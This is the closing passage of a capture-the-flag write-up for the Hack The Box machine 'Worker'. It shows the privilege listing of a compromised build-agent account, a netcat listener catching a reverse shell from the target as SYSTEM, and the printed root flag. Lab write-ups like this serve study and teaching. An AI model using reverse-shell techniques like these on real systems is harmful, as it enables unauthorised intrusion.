WORKER\VSTS_AgentService_G81207 Alias S-1-5-21-3082756831-2119193761-3468718151-1415 Mandatory group, Enabled by default, Enabled group
WORKER\VSTS_AgentService_G8be50 Alias S-1-5-21-3082756831-2119193761-3468718151-1416 Mandatory group, Enabled by default, Enabled group
WORKER\VSTS_AgentService_G8f9d6 Alias S-1-5-21-3082756831-2119193761-3468718151-1418 Mandatory group, Enabled by default, Enabled group
WORKER\VSTS_AgentService_G93a88 Alias S-1-5-21-3082756831-2119193761-3468718151-1420 Mandatory group, Enabled by default, Enabled group
WORKER\VSTS_AgentService_Gb286d Alias S-1-5-21-3082756831-2119193761-3468718151-1414 Mandatory group, Enabled by default, Enabled group
WORKER\VSTS_AgentService_Gb4ad8 Alias S-1-5-21-3082756831-2119193761-3468718151-1413 Mandatory group, Enabled by default, Enabled group
WORKER\VSTS_AgentService_Ge7dab Alias S-1-5-21-3082756831-2119193761-3468718151-1412 Mandatory group, Enabled by default, Enabled group
WORKER\VSTS_AgentService_Ged5e3 Alias S-1-5-21-3082756831-2119193761-3468718151-1417 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
PS W:\agents\agent11\_work\8\s>
I was happy to see that my script worked, and I got a reverse shell as NT Authority/System!

Root.txt

┌──(zweilos㉿kali)-[~/htb/worker]
└─$ nc -lvnp 8099
listening on [any] 8099 ...
connect to [10.10.15.98] from (UNKNOWN) [10.10.10.203] 51686
type C:\Administrator\Desktop\root.txt
PS W:\agents\agent11\_work\10\s> cd C:\
PS C:\> cd \users\Administrator\Desktop
PS C:\users\Administrator\Desktop> type root.txt
8af884b2e94242799a6b6dbb19eb9add
I unfortunately had to recreate my session as some automated process deleted it after a short time, but after so much effort I was able to retrieve my proof!
Thanks to ekenas for... [something interesting or useful about this machine.]
If you like this content and would like to see more, please consider buying me a coffee!